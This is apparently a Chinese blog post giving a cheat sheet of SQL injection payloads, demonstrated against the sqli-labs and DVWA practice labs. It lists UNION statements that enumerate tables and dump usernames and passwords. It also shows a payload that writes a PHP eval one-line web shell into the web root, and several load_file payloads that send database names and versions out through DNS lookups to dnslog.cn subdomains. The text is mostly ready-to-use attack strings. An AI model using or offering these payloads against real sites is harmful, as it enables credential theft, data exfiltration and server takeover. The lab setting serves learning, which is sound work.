SQL注入篇——常用注入语句

浪尽此生 提交于 2020-01-16 08:10:30

sql注入基本语句:

order by 4 ­­ ­
判断有多少列

union select 1,2,3 ­­ ­
判断数据显示点

union select 1,user(),database()­­ 
­显示出登录用户和数据库名

union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 
查看数据库有哪些表

union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3 
查看对应表有哪些列

union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3
查看账号密码信息

一、利用sql注入上传一句话木马

1.先判断显示位

在这里插入图片描述

2.再判断路径

在这里插入图片描述
注入语句:

http://localhost/sqli-labs-master/Less-2/?id=2 union select 1,1,"<?php eval($_REQUEST[23]); ?>" into dumpfile "C:\\phpStudy\\PHPTutorial\\WWW\\muma.php" -- 

在这里插入图片描述
成功
在这里插入图片描述
验证
在这里插入图片描述

二、sqli-labs利用dns回显数据

返回数据库名的注入语句:
http://localhost/sqli-labs-master/Less-2/?id=1 and load_file(concat("\\\\",(version()),".2bmmih.dnslog.cn\\1.txt"))

在这里插入图片描述
在这里插入图片描述

三、DVWA利用dns回显数据——low级别

返回数据库名的注入语句:
1' and load_file(concat("\\\\",(database()),".2bmmih.dnslog.cn\\1.txt")) -- -

在这里插入图片描述
在这里插入图片描述

三、DVWA利用dns回显数据——medium级别

使用Burp Suite抓包

在这里插入图片描述

四、DVWA利用dns回显数据——HIgh级别

返回数据库版本的注入语句:
1' and load_file(concat("\\\\",(version()),".3e6rl5.dnslog.cn\\1.txt")) -- -

在这里插入图片描述
成功
在这里插入图片描述

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!